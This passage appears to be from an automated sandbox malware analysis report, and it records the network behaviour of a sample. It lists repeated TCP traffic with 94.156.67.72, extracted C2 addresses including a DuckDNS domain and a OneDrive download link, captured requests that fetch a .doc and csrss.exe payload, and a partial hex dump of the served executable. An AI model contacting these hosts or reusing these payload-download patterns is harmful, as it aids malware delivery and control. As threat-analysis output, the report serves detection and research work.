Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
Source: global traffic	TCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo
Source: Malware configuration extractor	URLs: wwsaer.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: wwsaer.duckdns.org

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

Code function: 11_2_02C8CF48 InternetCheckConnectionA,

11_2_02C8CF48

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 91.92.251.26:8533

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 May 2024 18:21:05 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Thu, 23 May 2024 07:42:57 GMTETag: "153000-6191a33203e60"Accept-Ranges: bytesContent-Length: 1388544Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d4 05 00 00 58 0f 00 00 00 00 00 28 ec 05 00 00 10 00 00 00 f0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 15 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 13 00 40 25 00 00 00 00 14 00 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 13 00 d4 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 13 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 46 13 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 96 05 00 00 10 00 00 00 96 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 70 3c 00 00 00 b0 05 00 00 3e 00 00 00 9a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 07 0d 00 00 f0 05 00 00 08 0d 00 00 d8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 98 36 00 00 00 00 13 00 00 00 00 00 00 e0 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 40 25 00 00 00 40 13 00 00 26 00 00 00 e0 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 70 13 00 00 00 00 00 00 06 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 80 13 00 00 02 00 00 00 06 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 6b 00 00 00 90 13 00 00 6c 00 00 00 08 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 bc 01 00 00 00 14 00 00 bc 01 00 00 74 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 15 00 00 00 00 00 00 30 15 00 00 00

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 150.171.41.11 150.171.41.11
Source: Joe Sandbox View	IP Address: 13.107.137.11 13.107.137.11
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TERASYST-ASBG TERASYST-ASBG

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /NAvSGzZ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qr-in.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.156.67.72Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4020/csrss.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.156.67.72Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
